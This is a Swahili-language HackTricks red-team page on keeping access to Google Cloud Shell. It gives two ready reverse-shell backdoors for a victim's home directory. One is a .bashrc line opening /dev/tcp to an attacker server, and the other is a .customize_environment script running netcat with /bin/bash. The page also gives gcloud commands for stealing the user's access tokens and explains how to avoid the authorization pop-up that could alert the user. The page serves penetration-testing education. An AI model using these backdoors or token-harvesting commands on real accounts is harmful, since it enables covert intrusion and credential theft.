GCP - Cloud Shell Persistence
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Cloud Shell
Kwa maelezo zaidi angalia:
Persistent Backdoor
Google Cloud Shell inakupa ufikiaji wa amri kwa rasilimali zako za wingu moja kwa moja kutoka kwa kivinjari chako bila gharama yoyote inayohusiana.
Unaweza kufikia Cloud Shell ya Google kutoka web console au kwa kukimbia gcloud cloud-shell ssh
.
Konsoli hii ina uwezo wa kuvutia kwa washambuliaji:
- Mtumiaji yeyote wa Google mwenye ufikiaji wa Google Cloud ana ufikiaji wa mfano wa Cloud Shell ulio na uthibitisho kamili (Akaunti za Huduma zinaweza, hata ikiwa ni Wamiliki wa shirika).
- Mfano huo uta hifadhi saraka yake ya nyumbani kwa angalau siku 120 ikiwa hakuna shughuli inayoendelea.
- Hakuna uwezo wa shirika kufuatilia shughuli za mfano huo.
Hii kwa msingi inamaanisha kwamba mshambuliaji anaweza kuweka backdoor katika saraka ya nyumbani ya mtumiaji na kadri mtumiaji anavyounganisha na GC Shell kila siku 120 angalau, backdoor itadumu na mshambuliaji atapata shell kila wakati inapoendeshwa kwa kufanya:
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
Kuna faili nyingine katika folda ya nyumbani inayoitwa .customize_environment
ambayo, ikiwa ipo, itakuwa inasanidi kila wakati mtumiaji anapofikia cloud shell (kama katika mbinu ya awali). Ingiza tu backdoor ya awali au moja kama ifuatayo ili kudumisha uvumilivu kadri mtumiaji anavyotumia "mara kwa mara" cloud shell:
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
warning
Ni muhimu kutambua kwamba wakati wa kwanza kitendo kinachohitaji uthibitisho kinapofanywa, dirisha la idhini linaonekana kwenye kivinjari cha mtumiaji. Dirisha hili lazima likubaliwe kabla ya amri kuweza kuendesha. Ikiwa dirisha lisilotarajiwa linaonekana, linaweza kuleta wasiwasi na huenda likaharibu njia ya kudumu inayotumika.
Hii ni pop-up kutoka kwa kutekeleza gcloud projects list
kutoka kwa cloud shell (kama mshambuliaji) iliyoangaliwa katika kikao cha kivinjari cha mtumiaji:
.png)
Hata hivyo, ikiwa mtumiaji amekuwa akitumia cloudshell kwa shughuli, pop-up haitatokea na unaweza kusanya tokens za mtumiaji kwa:
gcloud auth print-access-token
gcloud auth application-default print-access-token
Jinsi muunganisho wa SSH unavyoanzishwa
Kimsingi, hizi API calls 3 zinatumika:
- https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey [POST] (itakufanya uongeze funguo yako ya umma uliyounda kwa ndani)
- https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start [POST] (itakufanya uanze mfano)
- https://content-cloudshell.googleapis.com/v1/users/me/environments/default [GET] (itakueleza ip ya google cloud shell)
Lakini unaweza kupata taarifa zaidi katika https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key
Marejeleo
- https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec
- https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key
- https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.